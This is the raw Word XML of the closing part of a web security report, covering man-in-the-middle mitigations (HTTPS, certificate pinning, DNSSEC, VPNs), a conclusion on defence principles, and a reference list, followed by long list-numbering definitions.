    <w:p w14:paraId="1D04E0F0"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In 2017, security researchers demonstrated a MITM vulnerability by creating a Wi-Fi network named "Equifax" in a public setting shortly after Equifax's data breach. When users connected to check if they were affected by the breach, they were redirected to a clone site that could collect additional personal information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F361946"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This highlighted how physical-world social engineering combines with technical MITM techniques and demonstrated the risks of public Wi-Fi networks during security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39747436"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6.4 Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439B1708" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>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lastRenderedPageBreak/>
        <w:t>HTTPS Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deploy HTTPS across all sites with proper certificate validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCF5876" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>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Certificate Pinning</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: Specify which certificates should be trusted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40817671" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>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Public Key Infrastructure:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement proper certificate verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A9A325" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>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DNS Security Extensions:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authenticate DNS responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E490F8" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>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Virtual Private Networks</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: Use VPNs on untrusted networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129A3B5C"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7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E3F3EA"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The web security landscape continues to evolve rapidly. This report has examined five critical web security threats, providing insights into their mechanisms, impacts, and mitigation strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61113A63"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Key themes across these threats include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9D4C2" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Defense in Depth:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> No single security measure protects against all threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47640CCA" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Input Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proper validation of user inputs is foundational.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B7407" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Principle of Least Privilege:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Systems should have only necessary access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF17CB" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Secure by Design:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security considerations should be integrated from the beginning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0130AC21" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Regular Security Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Continuous testing is essential for identifying vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348183F" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>As web applications handle increasingly sensitive functions and data, robust security practices become more crucial. Organizations must prioritize security awareness, implement strong technical controls, and remain vigilant about emerging threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD713D0" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391FD938"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lastRenderedPageBreak/>
        <w:t>OWASP Foundation. (2021). OWASP Top Ten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD1E33"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t>Sheehan, K. (2019). "Capital One Breach: A Case Study on the Need for Cloud Security."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDC50BC"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t>Kamkar, S. (2005). "Technical explanation of the MySpace worm."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45121DB4"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t>Facebook Engineering. (2018). "Security Update."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630A6153"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t>Hodges, J., Jackson, C., &amp; Barth, A. (2012). "HTTP Strict Transport Security (HSTS)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20448C50"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t>National Institute of Standards and Technology. (2020). "Guide to SQL Injection Prevention."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C7A6C4"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t>Mozilla Developer Network. (2021). "Content Security Policy (CSP)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06556E8B"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t>Stuttard, D., &amp; Pinto, M. (2018). The Web Application Hacker's Handbook.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E8CF6"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t>Zalewski, M. (2019). The Tangled Web: A Guide to Securing Modern Web Applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF27CC4" w14:textId="77777777" w:rsidR="001C7FFD" w:rsidRPr="001C7FFD" w:rsidRDefault="001C7FFD" w:rsidP="001C7FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Equifax Data Breach Settlement. (2019). Federal Trade Commission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1684506B" w14:textId="0D47A6E7" w:rsidR="00D23A61" w:rsidRPr="001C7FFD" w:rsidRDefault="00D23A61" w:rsidP="001C7FFD"/>
    <w:sectPr w:rsidR="00D23A61" w:rsidRPr="001C7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891"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD0AE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96E38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E2E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74660"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28C8D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C5931"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F79268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012E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E8645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61AD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="560A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C96FD7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3626B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C5AA7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE78F0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CA1692"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="243A4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B9573E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="390A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5391D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB96ED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A5ABE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF2CE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7A48E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1E2A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874BFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18220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36665F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="429A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F46BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCDE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26765D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C2A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1B22E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D56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D607C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63FC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225827"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="257C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237FA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E578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501DE4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDE274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5716CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD8E3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C45FAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8888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260FA8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA744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287652"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED90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C56067"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53462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363BD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86FA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3A5951"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5DB8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8846DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="574A22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F10C92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BED0AC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424EBB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="291A2B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AB29CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B3E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8D7605"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C90EB3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7B1E79"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A96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2B73BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1018D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7B7B56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B836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6876A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCB4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7A3C7C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E80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BD50F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F487E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D7292C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8960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A75F6C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DDC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E3440B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5128D9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E47177"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C40A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6A0490"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74F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932C25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C1A99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74334A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A32C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B03246"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B778FD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F136D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3D26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DB3F22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7EAE5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010E2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8294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4B19D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F908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4A5EE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D98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8E0D6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6AE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F91EC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70562A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7B0FA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C0A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0D0DF5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="29C28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0B19E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7248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9C4436"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B907A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4A6D4A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9BA5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39632B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E5C9C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68300E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5C4A2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254FEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F378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6B4D84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="093A3E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B42E13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A89A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0301CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD24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240182"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB26D0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652D91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79D676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CE6621"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8032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522BFA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E08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DC33D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70A0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46606F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74B814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7271EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B60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E27DFA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B18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F41781"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D13C9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CB51E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A8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893EFE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3BE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85A76CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD94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88089F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE140C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442883"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD6C14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D60903"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C90A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CD00B4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9308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DE3345"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48D44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F4F4336"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6472F4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513A71B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6AC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BD074F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0108E3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4E4C8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0BDC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8D21AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB98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9B44DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDF0BA0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536D4FC2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="166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7D73EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E42BE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59C012C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="535A18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5D75D05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A22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F850B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91F4E6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1C2E40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03787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704862"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E90925A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi"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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="56B17EB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D5AA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133F70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CDE6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72D1B22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F102F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7FE7D66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F7BE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BAF0BC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3EF2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8503A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60A0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F3E294F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC343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6315EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BB0A1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F7F61A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C4AF6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CD13B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F76C8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11B0446"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40DCB38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619A2DF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBDC2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D327A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00181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5EF4F76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="483C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0351E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CB833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64C4957"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C242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792F26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="099862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8892156"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40A68C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0479B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9184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AFF0A7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C2E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B9F7DC2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7C8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272ABC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78BA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EB7443E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77021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F5D00EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C4648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FD059D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53F2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04E3950"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD98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1227DB5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2F0FA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1F04C48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7AEAC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27B2055"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4488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3B123F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0540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49B3A47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01D6A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5367841"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63E81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5615E49"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E54A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5A92712"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="235C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6404177"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D62D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7E447F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA107D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8E37E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9EACD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9767052"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88885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98B1CCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A7F038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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="798C4672"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7CB81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6B3DD8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="888A94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E57805"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A1A99F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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7B205255"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7CA8B8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84749A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A4AFF4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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D9A5F7E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41C4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DD11EF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC906B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4150233">
    <w:abstractNumId w:val="133"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="750464924">
    <w:abstractNumId w:val="113"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="511796973">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1645312221">
    <w:abstractNumId w:val="111"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1115907321">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1905606516">
    <w:abstractNumId w:val="114"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2065719137">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="699671460">
    <w:abstractNumId w:val="103"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="148907941">
    <w:abstractNumId w:val="136"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2128162111">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2020348846">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2057007235">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1563953652">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1941376420">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1538083883">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="2084252174">
    <w:abstractNumId w:val="108"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1926760356">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1614827854">
    <w:abstractNumId w:val="91"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1675373740">
    <w:abstractNumId w:val="125"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="592671386">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="637806534">
    <w:abstractNumId w:val="105"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1426882272">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="626664283">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="983659068">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1098209197">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1627663439">
    <w:abstractNumId w:val="81"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="236093359">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="177699463">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="209805599">
    <w:abstractNumId w:val="112"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1043751546">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="386295586">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="999040492">
    <w:abstractNumId w:val="93"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="638269770">
    <w:abstractNumId w:val="134"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="239826408">
    <w:abstractNumId w:val="139"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="605425797">
    <w:abstractNumId w:val="14"/>
